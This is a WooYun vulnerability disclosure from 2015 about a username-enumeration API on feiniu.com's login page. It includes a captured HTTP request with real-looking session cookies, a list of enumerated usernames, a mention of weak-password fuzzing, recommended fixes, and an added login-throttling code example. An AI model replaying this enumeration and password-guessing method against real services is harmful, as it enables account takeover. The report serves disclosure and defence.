WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
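2015-11-09: Details reported to the vendor; awaiting vendor response
2015-11-09: Vendor confirmed; details disclosed to the vendor only
2015-11-19: Details disclosed to core white hats and relevant domain experts
2015-11-29: Details disclosed to regular white hats
2015-12-09: Details disclosed to intern white hats
2015-12-24: Details disclosed to the public
Mm.
At http://sjmember.feiniu.com/static/html/login.html, entering a username automatically checks whether the account exists. Capture the request: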
POST /service/call.do?callback=jQuery1720026086857076734304_1446970915778 HTTP/1.1
Host: sjmember.feiniu.com
Content-Length: 129
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Origin: http://sjmember.feiniu.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://sjmember.feiniu.com/static/html/wjml.html?backUrl=http%3A%2F%2Fzhaoshang.feiniu.com%2FapplyCompanyInfo%2Fapply.do
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: cart_token=0d35c93d46cf9f5a206bb5aae5f52f45_1446970157; guid=ZOy40cdO-ogR7-4G7l-89LB-eh72rLsHVDgL; first_login_time=1446970158429; _jzqx=1.1446970159.1446970159.1.jzqsr=wooyun%2Eorg|jzqct=/corps/page/33.-; _jzqckmp=1; _jzqy=1.1446970218.1446970218.1.jzqsr=baidu.-; uitox_shop=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2239d4b44810a7568bc40299f2d9bb1a08%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%2210.201.128.250%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A108%3A%22Mozilla%2F5.0+%28Windows+NT+6.3%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F45.0.2454.85+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1446970450%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D2b7ad4eb543ce59af9c547feb60e391b; access=3; ref=ref_https://www.baidu.com; C_dist=CPG6_CS000021; C_dist_area=CS000021_150400_150428_1504280005; _gat_UA-46390714-1=1; _ga=GA1.2.1484248303.1446970159; _jzqa=1.923256954181115300.1446970159.1446970159.1446970159.1; _jzqc=1; __xsptplus116=116.3.1446970453.1446970846.2%232%7Cwww.baidu.com%7C%7C%7C%7C%23%234FXsWj22qDz-3dE_y7P4JH1Q7X44Z1As%23; _jzqb=1.5.10.1446970159.1; b1e5e89ac7114e55=C10443A82E26E7624FD93A540626146C; csrf_cookie_uitox_member=d2e62ccd8b1596c48d27874e661c4c2e; 21dbedcc38ba9dce=aHR0cHMlM0ElMkYlMkZtZW1iZXIuZmVpbml1LmNvbSUyRmdldGF3YXklMkZsb2dpbkJhbm5lciUzRmNhbGxiYWNrJTNEalF1ZXJ5MTkxMDU1MTQyMjI2MDQ2ODgyNTdfMTQ0Njk3MDg5Mzk1MCUyNl8lM0QxNDQ2OTcwODkzOTUx; TS015ed114=01cfbf1eb56b07aec7026ec99117ea31800abfb6ab6ce610580f47e6c778a54ee60c53d2da5d3ae77b415b47dc1b1844395b31a63df409457ef27e980f6f84ed0a4aa447e096c94955dacff5fdc91ba90ded031619; Hm_lvt_7f78a821324600a0f059acdb24cf0937=1446970159,1446970218,1446970452; Hm_lpvt_7f78a821324600a0f059acdb24cf0937=1446970907; CLIENT_ID=14469709121968960115935
Connection: close

version=1.0&method=feiniu.member.isExistAccount&params=%7B%22userName%22%3A%22用户名%22%2C%22loginNameType%22%3A%22username%22%7D
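Find a username dictionary and run it through the request (用户名 in the request body is the username placeholder):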
1 zhangwei 200 false false 261
19 wanglei 200 false false 261
26 zhangjie 200 false false 261
27 zhanglei 200 false false 261
141 wangjian 200 false false 261
184 zhangkai 200 false false 261
235 chenliang 200 false false 261
255 wangjian 200 false false 261
261 zhangjie 200 false false 261
309 zhangjianguo 200 false false 261
320 zhanglei 200 false false 261
390 lixiang 200 false false 261
276 chenchen 200 false false 261
445 wanglei 200 false false 261
658 MANAGER 200 false false 261
3361 elaine 200 false false 261
4860 jackie 200 false false 261
5275 justin 200 false false 261
6054 louise 200 false false 261
8246 sherry 200 false false 261
8715 tiffany 200 false false 261
9325 yvette 200 false false 261
The pinyin entries are usernames. Fuzzing them for weak passwords then turned up some hits.
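1. Add a CAPTCHA to the login page
2. Limit the number of failed login password attempts
3. Force a password change for accounts with weak passwords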
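One way the three fixes above could fit together in a login handler, as an added example that is not part of the original report or the vendor's code. The class name LoginGuard, the thresholds, the status strings and the weak-password list are all assumptions chosen for illustration.

```python
import time
from collections import defaultdict, deque

MAX_FAILS = 5   # assumed threshold: failures allowed per window
WINDOW = 900    # assumed window length in seconds (15 minutes)
WEAK = {"123456", "password", "111111", "abc123"}  # constructed sample list


class LoginGuard:
    """Hypothetical helper: throttles failed logins and flags weak passwords."""

    def __init__(self, check_password, now=time.time):
        self.check_password = check_password  # callable(user, pw) -> bool
        self.now = now                        # injectable clock for testing
        self.fails = defaultdict(deque)       # key -> failure timestamps

    def _recent(self, key):
        q, cutoff = self.fails[key], self.now() - WINDOW
        while q and q[0] <= cutoff:           # drop failures outside the window
            q.popleft()
        return len(q)

    def is_weak(self, user, pw):
        # Weak if listed, shorter than 8 characters, or containing the username.
        return pw.lower() in WEAK or len(pw) < 8 or user.lower() in pw.lower()

    def login(self, user, pw, ip, captcha_ok=False):
        keys = (("user", user.lower()), ("ip", ip))
        # Fixes 1 and 2: after too many failures for this account or this
        # source, nothing is checked until a CAPTCHA has been solved.
        if not captcha_ok and any(self._recent(k) >= MAX_FAILS for k in keys):
            return "captcha_required"
        if not self.check_password(user, pw):
            t = self.now()
            for k in keys:
                self.fails[k].append(t)
            # Unknown users and wrong passwords get the same answer, so the
            # login path does not reveal whether an account exists.
            return "invalid_credentials"
        # Fix 3: a correct but weak password must be changed before use.
        if self.is_weak(user, pw):
            return "password_change_required"
        return "ok"
```

Requiring a CAPTCHA instead of locking the account keeps an outsider from locking real users out by failing logins on their behalf.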
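Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-11-09 12:24
The security department had already submitted this to the developers, and it was in development and testing, but it was still found. Many thanks :)
None yet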